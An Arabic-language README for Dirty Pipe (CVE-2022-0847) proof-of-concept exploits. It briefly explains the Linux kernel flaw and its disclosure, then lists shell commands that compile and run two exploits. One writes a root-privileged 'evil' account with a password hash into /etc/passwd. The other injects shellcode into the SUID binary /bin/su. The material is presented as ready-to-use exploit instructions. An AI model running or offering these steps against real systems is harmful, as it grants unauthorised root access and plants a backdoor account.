
استغلالات إثبات مفهوم لثغرة CVE-2022-0847 (Dirty Pipe) تتيح تصعيد الصلاحيات المحلية على أنوية Linux 5.8+ عن طريق الكتابة فوق الملفات للقراءة فقط أو ثنائيات SUID.
اليوم، كشف الباحث الأمني Max Kellermann بشكل مسؤول عن ثغرة 'Dirty Pipe' وذكر أنها تؤثر على Linux Kernel 5.8 والإصدارات الأحدث، حتى على أجهزة أندرويد.
تُتتبع الثغرة برقم CVE-2022-0847 وتسمح لمستخدم غير مميَّز بحقن البيانات والكتابة فوقها في الملفات للقراءة فقط، بما في ذلك عمليات SUID التي تعمل بصلاحيات الجذر.
اكتشف Kellerman الثغرة بعد تعقبه خطأ كان يُفسد سجلات الوصول لخادم الويب لدى أحد عملائه.
ثم كتب Bl4sty نسخة أخرى. فبدلاً من الكتابة فوق ملف مثل /etc/passwd، تكتب فوق ملف ثنائي SUID يحدده المستخدم (مثل /bin/su)، محقنةً شيفرة shellcode تُنفَّذ بعد ذلك بصلاحيات مستخدم مميَّز (أي الجذر).
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC1.c -o exploit1
┌──(ghost㉿uchiha)-[~]
└─$./exploit1 /etc/passwd 189 'evil:$6$USR$aNQSBWd3Bdn4Eo8ZaAjBBXW7M3CM7NnW3vX0Ulrei18dDifAiS0pB2iqCxVCK0nCKfRjdCSqgKHagkul6JEHT/:0:0::/root:/bin/bash
'
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC2.c -o exploit2
┌──(ghost㉿uchiha)-[~]
└─$./exploit2 /bin/su
للاستخدام المفصل، راجع: https://medium.com/@ajithcrajendran/cve-2022-0847-dirty-pipe-a5d68f422dcf